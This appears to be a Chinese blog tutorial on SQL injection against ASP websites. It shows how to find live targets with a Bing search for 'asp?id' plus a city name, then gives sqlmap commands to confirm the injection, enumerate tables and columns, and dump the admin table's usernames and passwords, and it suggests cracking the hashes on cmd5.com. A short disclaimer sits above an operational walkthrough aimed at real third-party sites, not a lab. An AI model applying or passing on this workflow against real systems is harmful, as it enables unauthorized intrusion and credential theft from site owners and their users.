特殊说明:本文档以技术角度出发,勿用于非法用途。
目前市面上主要的WEB开发语言分别为ASP、JSP以及PHP,当然也存在使用Python WEB等其它语言开发的,不管使用什么语言,网站的安全是至关重要的,今天我们以ASP为例,对网站的安全进行渗透测试。
今天所使用的方法是SQL注入,在渗透测试之前,我们需要找到ASP开发的网站,我们可以借助强大的搜索引擎,当然使用搜索引擎也需要技巧,要不会所查找的内容会被广告所干扰。其实最好的搜索引擎为google,但在我们国家是访问不了的,所以我们这里使用必应(“http://cn.bing.com/”)。
我们要查找网站地址中包含asp标识的网站,从而确认网站的开发语言,我们只要在必应搜索引擎中输入“asp?id”即可,我为了更准确找到指定地区的网站,我所使用的是“ “asp?id” and “沈阳” ”,如下图所示:
在搜索到的结果,中就可以看到目标的网站,如下图所示:
接下来我们检测网站是否存在漏洞,我们使用的命令是:
# 检测是否存在SQL注入漏洞(这里将网址替换为XXX) # -u 参数为后根网站URL sqlmap -u "http://www.xxx.com/qyzz_more.asp?id=589"
在检测结果后,如果出现操作系统及数据库信息时,说明我们找到了合适的目标,如下图所示:
web server operating system: Windows 2008 R2 or 7为操作系统类型。
web application technology: ASP.NET, Microsoft IIS 7.5, ASP为开发语言。
back-end DBMS: Microsoft Access为数据库类型。
通过枚举的方法,来进行数据库名称的检测。
# 枚举数据库名称(这里将网址替换为XXX) # --tables 标记为数据库名称 sqlmap -u "http://www.xxx.com/qyzz_more.asp?id=589" --tables
在图中可以看出,我们已经找到表名,可以在其中选择我们认为有意义的表名称。接下来就是对表中列进行枚举。
# 枚举字段(这里将网址替换为XXX) sqlmap -u "http://www.xxx.com/qyzz_more.asp?id=589" --columns -T "admin"
我们可以在图中看到存在的敏感字段。接下来我们就查看内容吧。
# 查看帐户信息(这里将网址替换为XXX) sqlmap -u "http://www.xxx.com/qyzz_more.asp?id=589" --dump -C "admin,password,username" -T "admin"
在图中可以看出,密码是经过加密的,我们可以到https://www.cmd5.com网站在线破解,如果是弱口令,很快就能破解出来。
评论(1)
给讲讲怎么用搜索引擎搜索吧。强烈建议。